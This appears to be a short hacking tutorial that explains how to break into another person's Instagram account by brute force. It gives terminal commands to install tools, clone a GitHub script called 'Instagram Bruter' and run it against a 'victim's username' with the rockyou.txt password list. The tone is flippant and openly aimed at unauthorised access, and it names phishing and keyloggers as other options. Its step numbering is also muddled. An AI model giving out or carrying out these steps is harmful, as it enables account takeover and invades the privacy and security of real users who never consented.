1:-There are different ways to hack an Instagram account like Phishing, Keyloggers, MITM, etc...
But in this tutorial, I’m going to demonstrate the “Bruteforce” attack
What is the Bruteforce attack and how can it be done?
Bruteforce attack is an attack that is done by Bruteforcing programs. A Bruteforce program is coded to try random passwords until it finds the correct one.
we’re going to use a python Script called Instagram Bruter
1.Open Terminal
2.apt update && apt ugrade -y
3.apt-get install git
4.apt-get install python
5.apt-get install python3
2.cd Desktop
3.git clone https://github.com/Pure-L0G1C/Instagram
OK.So now that we have cloned it we do this:
chmod -R 755 Instagram && cd Instagram
After typing this command above 👆 we go to its directory:
1.cd Instagram
3.python instagram.py -h (this is the help command to show you how to use it but if you wanna skip this part then follow next steps ;)
Ok so here comes the important part where you hack someone’s insta xD
So you will type these commands:
python instagram.py xxxxxxx (here should be your victim's username) Desktop/rockyou.txt (here is the wordlist of the passwords)
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